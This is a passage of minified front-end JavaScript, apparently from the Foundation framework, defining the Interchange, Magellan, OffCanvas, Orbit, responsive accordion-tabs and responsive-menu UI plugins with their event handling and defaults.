t?e:t}(this,(r.__proto__||Object.getPrototypeOf(r)).apply(this,arguments))}return function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}(r,a["a"]),c(r,[{key:"_setup",value:function(e,t){this.$element=e,this.options=o.a.extend({},r.defaults,t),this.rules=[],this.currentPath="",this.className="Interchange",this._init(),this._events()}},{key:"_init",value:function(){s.a._init();var e=this.$element[0].id||i.i(l.b)(6,"interchange");this.$element.attr({"data-resize":e,id:e}),this._addBreakpoints(),this._generateRules(),this._reflow()}},{key:"_events",value:function(){var e=this;this.$element.off("resizeme.zf.trigger").on("resizeme.zf.trigger",function(){return e._reflow()})}},{key:"_reflow",value:function(){var e;for(var t in this.rules)if(this.rules.hasOwnProperty(t)){var i=this.rules[t];window.matchMedia(i.query).matches&&(e=i)}e&&this.replace(e.path)}},{key:"_addBreakpoints",value:function(){for(var e in s.a.queries)if(s.a.queries.hasOwnProperty(e)){var t=s.a.queries[e];r.SPECIAL_QUERIES[t.name]=t.value}}},{key:"_generateRules",value:function(e){var t,i=[];for(var n in t="string"==typeof(t=this.options.rules?this.options.rules:this.$element.data("interchange"))?t.match(/\[.*?\]/g):t)if(t.hasOwnProperty(n)){var o=t[n].slice(1,-1).split(", "),s=o.slice(0,-1).join(""),a=o[o.length-1];r.SPECIAL_QUERIES[a]&&(a=r.SPECIAL_QUERIES[a]),i.push({path:s,query:a})}this.rules=i}},{key:"replace",value:function(t){if(this.currentPath!==t){var i=this,n="replaced.zf.interchange";"IMG"===this.$element[0].nodeName?this.$element.attr("src",t).on("load",function(){i.currentPath=t}).trigger(n):t.match(/\.(gif|jpg|jpeg|png|svg|tiff)([?#].*)?/i)?(t=t.replace(/\(/g,"%28").replace(/\)/g,"%29"),this.$element.css({"background-image":"url("+t+")"}).trigger(n)):o.a.get(t,function(e){i.$element.html(e).trigger(n),o()(e).foundation(),i.currentPath=t})}}},{key:"_destroy",value:function(){this.$element.off("resizeme.zf.trigger")}}]),r}();r.defaults={rules:null},r.SPECIAL_QUERIES={landscape:"screen and (orientation: landscape)",portrait:"screen and (orientation: portrait)",retina:"only screen and (-webkit-min-device-pixel-ratio: 2), only screen and (min--moz-device-pixel-ratio: 2), only screen and (-o-min-device-pixel-ratio: 2/1), only screen and (min-device-pixel-ratio: 2), only screen and (min-resolution: 192dpi), only screen and (min-resolution: 2dppx)"}},function(e,t,n){"use strict";n.d(t,"a",function(){return c});var i=n(0),o=n.n(i),s=n(1),a=n(2),r=n(16),l=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),c=function(e){function i(){return function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,i),function(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}(this,(i.__proto__||Object.getPrototypeOf(i)).apply(this,arguments))}return function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}(i,a["a"]),l(i,[{key:"_setup",value:function(e,t){this.$element=e,this.options=o.a.extend({},i.defaults,this.$element.data(),t),this.className="Magellan",this._init(),this.calcPoints()}},{key:"_init",value:function(){var e=this.$element[0].id||n.i(s.b)(6,"magellan");this.$targets=o()("[data-magellan-target]"),this.$links=this.$element.find("a"),this.$element.attr({"data-resize":e,"data-scroll":e,id:e}),this.$active=o()(),this.scrollPos=parseInt(window.pageYOffset,10),this._events()}},{key:"calcPoints",value:function(){var i=this,e=document.body,t=document.documentElement;this.points=[],this.winHeight=Math.round(Math.max(window.innerHeight,t.clientHeight)),this.docHeight=Math.round(Math.max(e.scrollHeight,e.offsetHeight,t.clientHeight,t.scrollHeight,t.offsetHeight)),this.$targets.each(function(){var e=o()(this),t=Math.round(e.offset().top-i.options.threshold);e.targetPoint=t,i.points.push(t)})}},{key:"_events",value:function(){var i=this;o()("html, body"),i.options.animationDuration,i.options.animationEasing;o()(window).one("load",function(){i.options.deepLinking&&location.hash&&i.scrollToLoc(location.hash),i.calcPoints(),i._updateActive()}),this.$element.on({"resizeme.zf.trigger":this.reflow.bind(this),"scrollme.zf.trigger":this._updateActive.bind(this)}).on("click.zf.magellan",'a[href^="#"]',function(e){e.preventDefault();var t=this.getAttribute("href");i.scrollToLoc(t)}),this._deepLinkScroll=function(e){i.options.deepLinking&&i.scrollToLoc(window.location.hash)},o()(window).on("popstate",this._deepLinkScroll)}},{key:"scrollToLoc",value:function(e){this._inTransition=!0;var t=this,i={animationEasing:this.options.animationEasing,animationDuration:this.options.animationDuration,threshold:this.options.threshold,offset:this.options.offset};r.a.scrollToLoc(e,i,function(){t._inTransition=!1,t._updateActive()})}},{key:"reflow",value:function(){this.calcPoints(),this._updateActive()}},{key:"_updateActive",value:function(){if(!this._inTransition){var e,i=parseInt(window.pageYOffset,10);if(i+this.winHeight===this.docHeight)e=this.points.length-1;else if(i<this.points[0])e=void 0;else{var n=this.scrollPos<i,o=this,t=this.points.filter(function(e,t){return n?e-o.options.offset<=i:e-o.options.offset-o.options.threshold<=i});e=t.length?t.length-1:0}if(this.$active.removeClass(this.options.activeClass),this.$active=this.$links.filter('[href="#'+this.$targets.eq(e).data("magellan-target")+'"]').addClass(this.options.activeClass),this.options.deepLinking){var s="";null!=e&&(s=this.$active[0].getAttribute("href")),s!==window.location.hash&&(window.history.pushState?window.history.pushState(null,null,s):window.location.hash=s)}this.scrollPos=i,this.$element.trigger("update.zf.magellan",[this.$active])}}},{key:"_destroy",value:function(){if(this.$element.off(".zf.trigger .zf.magellan").find("."+this.options.activeClass).removeClass(this.options.activeClass),this.options.deepLinking){var e=this.$active[0].getAttribute("href");window.location.hash.replace(e,"")}o()(window).off("popstate",this._deepLinkScroll)}}]),i}();c.defaults={animationDuration:500,animationEasing:"linear",threshold:50,activeClass:"is-active",deepLinking:!1,offset:0}},function(e,t,o){"use strict";o.d(t,"a",function(){return n});var i=o(0),s=o.n(i),a=o(3),r=o(4),l=o(1),c=o(2),u=o(5),d=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),n=function(e){function n(){return function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,n),function(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}(this,(n.__proto__||Object.getPrototypeOf(n)).apply(this,arguments))}return function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}(n,c["a"]),d(n,[{key:"_setup",value:function(e,t){var i=this;this.className="OffCanvas",this.$element=e,this.options=s.a.extend({},n.defaults,this.$element.data(),t),this.contentClasses={base:[],reveal:[]},this.$lastTrigger=s()(),this.$triggers=s()(),this.position="left",this.$content=s()(),this.nested=!!this.options.nested,s()(["push","overlap"]).each(function(e,t){i.contentClasses.base.push("has-transition-"+t)}),s()(["left","right","top","bottom"]).each(function(e,t){i.contentClasses.base.push("has-position-"+t),i.contentClasses.reveal.push("has-reveal-"+t)}),u.a.init(s.a),r.a._init(),this._init(),this._events(),a.a.register("OffCanvas",{ESCAPE:"close"})}},{key:"_init",value:function(){var e=this.$element.attr("id");if(this.$element.attr("aria-hidden","true"),this.options.contentId?this.$content=s()("#"+this.options.contentId):this.$element.siblings("[data-off-canvas-content]").length?this.$content=this.$element.siblings("[data-off-canvas-content]").first():this.$content=this.$element.closest("[data-off-canvas-content]").first(),this.options.contentId?this.options.contentId&&null===this.options.nested&&console.warn("Remember to use the nested option if using the content ID option!"):this.nested=0===this.$element.siblings("[data-off-canvas-content]").length,!0===this.nested&&(this.options.transition="overlap",this.$element.removeClass("is-transition-push")),this.$element.addClass("is-transition-"+this.options.transition+" is-closed"),this.$triggers=s()(document).find('[data-open="'+e+'"], [data-close="'+e+'"], [data-toggle="'+e+'"]').attr("aria-expanded","false").attr("aria-controls",e),this.position=this.$element.is(".position-left, .position-top, .position-right, .position-bottom")?this.$element.attr("class").match(/position\-(left|top|right|bottom)/)[1]:this.position,!0===this.options.contentOverlay){var t=document.createElement("div"),i="fixed"===s()(this.$element).css("position")?"is-overlay-fixed":"is-overlay-absolute";t.setAttribute("class","js-off-canvas-overlay "+i),this.$overlay=s()(t),"is-overlay-fixed"===i?s()(this.$overlay).insertAfter(this.$element):this.$content.append(this.$overlay)}this.options.isRevealed=this.options.isRevealed||new RegExp(this.options.revealClass,"g").test(this.$element[0].className),!0===this.options.isRevealed&&(this.options.revealOn=this.options.revealOn||this.$element[0].className.match(/(reveal-for-medium|reveal-for-large)/g)[0].split("-")[2],this._setMQChecker()),this.options.transitionTime&&this.$element.css("transition-duration",this.options.transitionTime),this._removeContentClasses()}},{key:"_events",value:function(){(this.$element.off(".zf.trigger .zf.offcanvas").on({"open.zf.trigger":this.open.bind(this),"close.zf.trigger":this.close.bind(this),"toggle.zf.trigger":this.toggle.bind(this),"keydown.zf.offcanvas":this._handleKeyboard.bind(this)}),!0===this.options.closeOnClick)&&(this.options.contentOverlay?this.$overlay:this.$content).on({"click.zf.offcanvas":this.close.bind(this)})}},{key:"_setMQChecker",value:function(){var e=this;s()(window).on("changed.zf.mediaquery",function(){r.a.atLeast(e.options.revealOn)?e.reveal(!0):e.reveal(!1)}).one("load.zf.offcanvas",function(){r.a.atLeast(e.options.revealOn)&&e.reveal(!0)})}},{key:"_removeContentClasses",value:function(e){"boolean"!=typeof e?this.$content.removeClass(this.contentClasses.base.join(" ")):!1===e&&this.$content.removeClass("has-reveal-"+this.position)}},{key:"_addContentClasses",value:function(e){this._removeContentClasses(e),"boolean"!=typeof e?this.$content.addClass("has-transition-"+this.options.transition+" has-position-"+this.position):!0===e&&this.$content.addClass("has-reveal-"+this.position)}},{key:"reveal",value:function(e){e?(this.close(),this.isRevealed=!0,this.$element.attr("aria-hidden","false"),this.$element.off("open.zf.trigger toggle.zf.trigger"),this.$element.removeClass("is-closed")):(this.isRevealed=!1,this.$element.attr("aria-hidden","true"),this.$element.off("open.zf.trigger toggle.zf.trigger").on({"open.zf.trigger":this.open.bind(this),"toggle.zf.trigger":this.toggle.bind(this)}),this.$element.addClass("is-closed")),this._addContentClasses(e)}},{key:"_stopScrolling",value:function(e){return!1}},{key:"_recordScrollable",value:function(e){var t=this;t.scrollHeight!==t.clientHeight&&(0===t.scrollTop&&(t.scrollTop=1),t.scrollTop===t.scrollHeight-t.clientHeight&&(t.scrollTop=t.scrollHeight-t.clientHeight-1)),t.allowUp=0<t.scrollTop,t.allowDown=t.scrollTop<t.scrollHeight-t.clientHeight,t.lastY=e.originalEvent.pageY}},{key:"_stopScrollPropagation",value:function(e){var t=e.pageY<this.lastY,i=!t;this.lastY=e.pageY,t&&this.allowUp||i&&this.allowDown?e.stopPropagation():e.preventDefault()}},{key:"open",value:function(e,t){if(!this.$element.hasClass("is-open")&&!this.isRevealed){var i=this;t&&(this.$lastTrigger=t),"top"===this.options.forceTo?window.scrollTo(0,0):"bottom"===this.options.forceTo&&window.scrollTo(0,document.body.scrollHeight),this.options.transitionTime&&"overlap"!==this.options.transition?this.$element.siblings("[data-off-canvas-content]").css("transition-duration",this.options.transitionTime):this.$element.siblings("[data-off-canvas-content]").css("transition-duration",""),this.$element.addClass("is-open").removeClass("is-closed"),this.$triggers.attr("aria-expanded","true"),this.$element.attr("aria-hidden","false").trigger("opened.zf.offcanvas"),this.$content.addClass("is-open-"+this.position),!1===this.options.contentScroll&&(s()("body").addClass("is-off-canvas-open").on("touchmove",this._stopScrolling),this.$element.on("touchstart",this._recordScrollable),this.$element.on("touchmove",this._stopScrollPropagation)),!0===this.options.contentOverlay&&this.$overlay.addClass("is-visible"),!0===this.options.closeOnClick&&!0===this.options.contentOverlay&&this.$overlay.addClass("is-closable"),!0===this.options.autoFocus&&this.$element.one(o.i(l.c)(this.$element),function(){if(i.$element.hasClass("is-open")){var e=i.$element.find("[data-autofocus]");e.length?e.eq(0).focus():i.$element.find("a, button").eq(0).focus()}}),!0===this.options.trapFocus&&(this.$content.attr("tabindex","-1"),a.a.trapFocus(this.$element)),this._addContentClasses()}}},{key:"close",value:function(e){if(this.$element.hasClass("is-open")&&!this.isRevealed){var t=this;this.$element.removeClass("is-open"),this.$element.attr("aria-hidden","true").trigger("closed.zf.offcanvas"),this.$content.removeClass("is-open-left is-open-top is-open-right is-open-bottom"),!1===this.options.contentScroll&&(s()("body").removeClass("is-off-canvas-open").off("touchmove",this._stopScrolling),this.$element.off("touchstart",this._recordScrollable),this.$element.off("touchmove",this._stopScrollPropagation)),!0===this.options.contentOverlay&&this.$overlay.removeClass("is-visible"),!0===this.options.closeOnClick&&!0===this.options.contentOverlay&&this.$overlay.removeClass("is-closable"),this.$triggers.attr("aria-expanded","false"),!0===this.options.trapFocus&&(this.$content.removeAttr("tabindex"),a.a.releaseFocus(this.$element)),this.$element.one(o.i(l.c)(this.$element),function(e){t.$element.addClass("is-closed"),t._removeContentClasses()})}}},{key:"toggle",value:function(e,t){this.$element.hasClass("is-open")?this.close(e,t):this.open(e,t)}},{key:"_handleKeyboard",value:function(e){var t=this;a.a.handleKey(e,"OffCanvas",{close:function(){return t.close(),t.$lastTrigger.focus(),!0},handled:function(){e.stopPropagation(),e.preventDefault()}})}},{key:"_destroy",value:function(){this.close(),this.$element.off(".zf.trigger .zf.offcanvas"),this.$overlay.off(".zf.offcanvas")}}]),n}();n.defaults={closeOnClick:!0,contentOverlay:!0,contentId:null,nested:null,contentScroll:!0,transitionTime:null,transition:"push",forceTo:null,isRevealed:!1,revealOn:null,autoFocus:!0,revealClass:"reveal-for-",trapFocus:!1}},function(e,t,n){"use strict";n.d(t,"a",function(){return p});var i=n(0),s=n.n(i),o=n(3),u=n(6),a=n(18),r=n(8),l=n(1),c=n(2),d=n(10),h=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),p=function(e){function i(){return function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,i),function(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}(this,(i.__proto__||Object.getPrototypeOf(i)).apply(this,arguments))}return function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}(i,c["a"]),h(i,[{key:"_setup",value:function(e,t){this.$element=e,this.options=s.a.extend({},i.defaults,this.$element.data(),t),this.className="Orbit",d.a.init(s.a),this._init(),o.a.register("Orbit",{ltr:{ARROW_RIGHT:"next",ARROW_LEFT:"previous"},rtl:{ARROW_LEFT:"next",ARROW_RIGHT:"previous"}})}},{key:"_init",value:function(){this._reset(),this.$wrapper=this.$element.find("."+this.options.containerClass),this.$slides=this.$element.find("."+this.options.slideClass);var e=this.$element.find("img"),t=this.$slides.filter(".is-active"),i=this.$element[0].id||n.i(l.b)(6,"orbit");this.$element.attr({"data-resize":i,id:i}),t.length||this.$slides.eq(0).addClass("is-active"),this.options.useMUI||this.$slides.addClass("no-motionui"),e.length?n.i(r.a)(e,this._prepareForOrbit.bind(this)):this._prepareForOrbit(),this.options.bullets&&this._loadBullets(),this._events(),this.options.autoPlay&&1<this.$slides.length&&this.geoSync(),this.options.accessible&&this.$wrapper.attr("tabindex",0)}},{key:"_loadBullets",value:function(){this.$bullets=this.$element.find("."+this.options.boxOfBullets).find("button")}},{key:"geoSync",value:function(){var e=this;this.timer=new a.a(this.$element,{duration:this.options.timerDelay,infinite:!1},function(){e.changeSlide(!0)}),this.timer.start()}},{key:"_prepareForOrbit",value:function(){this._setWrapperHeight()}},{key:"_setWrapperHeight",value:function(e){var t,i=0,n=0,o=this;this.$slides.each(function(){t=this.getBoundingClientRect().height,s()(this).attr("data-slide",n),/mui/g.test(s()(this)[0].className)||o.$slides.filter(".is-active")[0]===o.$slides.eq(n)[0]||s()(this).css({position:"relative",display:"none"}),i=i<t?t:i,n++}),n===this.$slides.length&&(this.$wrapper.css({height:i}),e&&e(i))}},{key:"_setSlideHeight",value:function(e){this.$slides.each(function(){s()(this).css("max-height",e)})}},{key:"_events",value:function(){var n=this;if(this.$element.off(".resizeme.zf.trigger").on({"resizeme.zf.trigger":this._prepareForOrbit.bind(this)}),1<this.$slides.length){if(this.options.swipe&&this.$slides.off("swipeleft.zf.orbit swiperight.zf.orbit").on("swipeleft.zf.orbit",function(e){e.preventDefault(),n.changeSlide(!0)}).on("swiperight.zf.orbit",function(e){e.preventDefault(),n.changeSlide(!1)}),this.options.autoPlay&&(this.$slides.on("click.zf.orbit",function(){n.$element.data("clickedOn",!n.$element.data("clickedOn")),n.timer[n.$element.data("clickedOn")?"pause":"start"]()}),this.options.pauseOnHover&&this.$element.on("mouseenter.zf.orbit",function(){n.timer.pause()}).on("mouseleave.zf.orbit",function(){n.$element.data("clickedOn")||n.timer.start()})),this.options.navButtons)this.$element.find("."+this.options.nextClass+", ."+this.options.prevClass).attr("tabindex",0).on("click.zf.orbit touchend.zf.orbit",function(e){e.preventDefault(),n.changeSlide(s()(this).hasClass(n.options.nextClass))});this.options.bullets&&this.$bullets.on("click.zf.orbit touchend.zf.orbit",function(){if(/is-active/g.test(this.className))return!1;var e=s()(this).data("slide"),t=e>n.$slides.filter(".is-active").data("slide"),i=n.$slides.eq(e);n.changeSlide(t,i,e)}),this.options.accessible&&this.$wrapper.add(this.$bullets).on("keydown.zf.orbit",function(e){o.a.handleKey(e,"Orbit",{next:function(){n.changeSlide(!0)},previous:function(){n.changeSlide(!1)},handled:function(){s()(e.target).is(n.$bullets)&&n.$bullets.filter(".is-active").focus()}})})}}},{key:"_reset",value:function(){void 0!==this.$slides&&1<this.$slides.length&&(this.$element.off(".zf.orbit").find("*").off(".zf.orbit"),this.options.autoPlay&&this.timer.restart(),this.$slides.each(function(e){s()(e).removeClass("is-active is-active is-in").removeAttr("aria-live").hide()}),this.$slides.first().addClass("is-active").show(),this.$element.trigger("slidechange.zf.orbit",[this.$slides.first()]),this.options.bullets&&this._updateBullets(0))}},{key:"changeSlide",value:function(e,t,i){if(this.$slides){var n=this.$slides.filter(".is-active").eq(0);if(/mui/g.test(n[0].className))return!1;var o,s=this.$slides.first(),a=this.$slides.last(),r=e?"Right":"Left",l=e?"Left":"Right",c=this;(o=t||(e?this.options.infiniteWrap?n.next("."+this.options.slideClass).length?n.next("."+this.options.slideClass):s:n.next("."+this.options.slideClass):this.options.infiniteWrap?n.prev("."+this.options.slideClass).length?n.prev("."+this.options.slideClass):a:n.prev("."+this.options.slideClass))).length&&(this.$element.trigger("beforeslidechange.zf.orbit",[n,o]),this.options.bullets&&(i=i||this.$slides.index(o),this._updateBullets(i)),this.options.useMUI&&!this.$element.is(":hidden")?(u.a.animateIn(o.addClass("is-active").css({position:"absolute",top:0}),this.options["animInFrom"+r],function(){o.css({position:"relative",display:"block"}).attr("aria-live","polite")}),u.a.animateOut(n.removeClass("is-active"),this.options["animOutTo"+l],function(){n.removeAttr("aria-live"),c.options.autoPlay&&!c.timer.isPaused&&c.timer.restart()})):(n.removeClass("is-active is-in").removeAttr("aria-live").hide(),o.addClass("is-active is-in").attr("aria-live","polite").show(),this.options.autoPlay&&!this.timer.isPaused&&this.timer.restart()),this.$element.trigger("slidechange.zf.orbit",[o]))}}},{key:"_updateBullets",value:function(e){var t=this.$element.find("."+this.options.boxOfBullets).find(".is-active").removeClass("is-active").blur().find("span:last").detach();this.$bullets.eq(e).addClass("is-active").append(t)}},{key:"_destroy",value:function(){this.$element.off(".zf.orbit").find("*").off(".zf.orbit").end().hide()}}]),i}();p.defaults={bullets:!0,navButtons:!0,animInFromRight:"slide-in-right",animOutToRight:"slide-out-right",animInFromLeft:"slide-in-left",animOutToLeft:"slide-out-left",autoPlay:!0,timerDelay:5e3,infiniteWrap:!0,swipe:!0,pauseOnHover:!0,accessible:!0,containerClass:"orbit-container",slideClass:"orbit-slide",boxOfBullets:"orbit-bullets",nextClass:"orbit-next",prevClass:"orbit-previous",useMUI:!0}},function(e,t,u){"use strict";u.d(t,"a",function(){return c});var i=u(0),d=u.n(i),a=u(4),h=u(1),n=u(2),o=u(11),s=u(17),r=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),l={tabs:{cssClass:"tabs",plugin:s.a},accordion:{cssClass:"accordion",plugin:o.a}},c=function(e){function t(){return function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,t),function(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}(this,(t.__proto__||Object.getPrototypeOf(t)).apply(this,arguments))}return function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}(t,n["a"]),r(t,[{key:"_setup",value:function(e,t){this.$element=d()(e),this.options=d.a.extend({},this.$element.data(),t),this.rules=this.$element.data("responsive-accordion-tabs"),this.currentMq=null,this.currentPlugin=null,this.className="ResponsiveAccordionTabs",this.$element.attr("id")||this.$element.attr("id",u.i(h.b)(6,"responsiveaccordiontabs")),this._init(),this._events()}},{key:"_init",value:function(){if(a.a._init(),"string"==typeof this.rules){for(var e={},t=this.rules.split(" "),i=0;i<t.length;i++){var n=t[i].split("-"),o=1<n.length?n[0]:"small",s=1<n.length?n[1]:n[0];null!==l[s]&&(e[o]=l[s])}this.rules=e}this._getAllOptions(),d.a.isEmptyObject(this.rules)||this._checkMediaQueries()}},{key:"_getAllOptions",value:function(){for(var e in this.allOptions={},l)if(l.hasOwnProperty(e)){var t=l[e];try{var i=d()("<ul></ul>"),n=new t.plugin(i,this.options);for(var o in n.options)if(n.options.hasOwnProperty(o)&&"zfPlugin"!==o){var s=n.options[o];this.allOptions[o]=s}n.destroy()}catch(e){}}}},{key:"_events",value:function(){var e=this;d()(window).on("changed.zf.mediaquery",function(){e._checkMediaQueries()})}},{key:"_checkMediaQueries",value:function(){var t,i=this;d.a.each(this.rules,function(e){a.a.atLeast(e)&&(t=e)}),t&&(this.currentPlugin instanceof this.rules[t].plugin||(d.a.each(l,function(e,t){i.$element.removeClass(t.cssClass)}),this.$element.addClass(this.rules[t].cssClass),this.currentPlugin&&(!this.currentPlugin.$element.data("zfPlugin")&&this.storezfData&&this.currentPlugin.$element.data("zfPlugin",this.storezfData),this.currentPlugin.destroy()),this._handleMarkup(this.rules[t].cssClass),this.currentPlugin=new this.rules[t].plugin(this.$element,{}),this.storezfData=this.currentPlugin.$element.data("zfPlugin")))}},{key:"_handleMarkup",value:function(e){var i=this,t="accordion",n=d()("[data-tabs-content="+this.$element.attr("id")+"]");if(n.length&&(t="tabs"),t!==e){var o=i.allOptions.linkClass?i.allOptions.linkClass:"tabs-title",s=i.allOptions.panelClass?i.allOptions.panelClass:"tabs-panel";this.$element.removeAttr("role");var a=this.$element.children("."+o+",[data-accordion-item]").removeClass(o).removeClass("accordion-item").removeAttr("data-accordion-item"),r=a.children("a").removeClass("accordion-title");if("tabs"===t?(n=n.children("."+s).removeClass(s).removeAttr("role").removeAttr("aria-hidden").removeAttr("aria-labelledby")).children("a").removeAttr("role").removeAttr("aria-controls").removeAttr("aria-selected"):n=a.children("[data-tab-content]").removeClass("accordion-content"),n.css({display:"",visibility:""}),a.css({display:"",visibility:""}),"accordion"===e)n.each(function(e,t){d()(t).appendTo(a.get(e)).addClass("accordion-content").attr("data-tab-content","").removeClass("is-active").css({height:""}),d()("[data-tabs-content="+i.$element.attr("id")+"]").after('<div id="tabs-placeholder-'+i.$element.attr("id")+'"></div>').detach(),a.addClass("accordion-item").attr("data-accordion-item",""),r.addClass("accordion-title")});else if("tabs"===e){var l=d()("[data-tabs-content="+i.$element.attr("id")+"]"),c=d()("#tabs-placeholder-"+i.$element.attr("id"));c.length?(l=d()('<div class="tabs-content"></div>').insertAfter(c).attr("data-tabs-content",i.$element.attr("id")),c.remove()):l=d()('<div class="tabs-content"></div>').insertAfter(i.$element).attr("data-tabs-content",i.$element.attr("id")),n.each(function(e,t){var i=d()(t).appendTo(l).addClass(s),n=r.get(e).hash.slice(1),o=d()(t).attr("id")||u.i(h.b)(6,"accordion");n!==o&&(""!==n?d()(t).attr("id",n):(n=o,d()(t).attr("id",n),d()(r.get(e)).attr("href",d()(r.get(e)).attr("href").replace("#","")+"#"+n))),d()(a.get(e)).hasClass("is-active")&&i.addClass("is-active")}),a.addClass(o)}}}},{key:"_destroy",value:function(){this.currentPlugin&&this.currentPlugin.destroy(),d()(window).off(".zf.ResponsiveAccordionTabs")}}]),t}();c.defaults={}},function(e,t,a){"use strict";a.d(t,"a",function(){return p});var i=a(0),r=a.n(i),l=a(4),c=a(1),n=a(2),o=a(14),s=a(13),u=a(12),d=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),h={dropdown:{cssClass:"dropdown",plugin:o.a},drilldown:{cssClass:"drilldown",plugin:s.a},accordion:{cssClass:"accordion-menu",plugin:u.a}},p=function(e){function t(){return function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,t),function(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}(this,(t.__proto__||Object.getPrototypeOf(t)).apply(this,arguments))}return function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}(t,n["a"]),d(t,[{key:"_setup",value:function(e,t){this.$element=r()(e),this.rules=this.$element.data("responsive-menu"),this.currentMq=null,this.currentPlugin=null,this.className="ResponsiveMenu",this._init(),this._events()}},{key:"_init",value:function(){if(l.a._init(),"string"==typeof this.rules){for(var e={},t=this.rules.split(" "),i=0;i<t.length;i++){var n=t[i].split("-"),o=1<n.length?n[0]:"small",s=1<n.length?n[1]:n[0];null!==h[s]&&(e[o]=h[s])}this.rules=e}r.a.isEmptyObject(this.rules)||this._checkMediaQueries(),this.$element.attr("data-mutate",this.$element.attr("data-mutate")||a.i(c.b)(6,"responsive-menu"))}},{key:"_events",value:function(){var e=this;r()(window).on("changed.zf.mediaquery",function(){e._checkMediaQueries()})}},{key:"_checkMediaQueries",value:function(){var t,i=this;r.a.each(this.rules,function(e){l.a.atLeast(e)&&(t=e)}),t&&(this.currentPlugin instanceof this.rules[t].plugin||(r.a.each(h,function(e,t){i.$element.removeClass(t.cssClass)}),this.$element.addClass(this.rules[t].cssClass),this.currentPlugin&&this.currentPlugin.destroy(),this.currentPlugin=new this.rules[t].plugin(this.$element,{})))}},{key:"_destroy",value:function(){this.currentPlugin.destroy(),r()(window).off(".zf.ResponsiveMenu")}}]),t}();p.defaults={}},function(e,t,i){"use strict";i.d(t,"a",function(){return c});var n=i(0),o=i.n(n),s=i(4),a=i(6),r=i(2),l=function(){function n(e,t){for(var i=0;i<t.length;i++){var n=t[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,i){return t&&n(e.prototype,t),i&&n(e,i),e}}(),c=function(e){function i(){return function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,i),function(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}(this,(i.__proto__||Object.getPrototypeOf(i)).apply(this,arguments))}return function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof 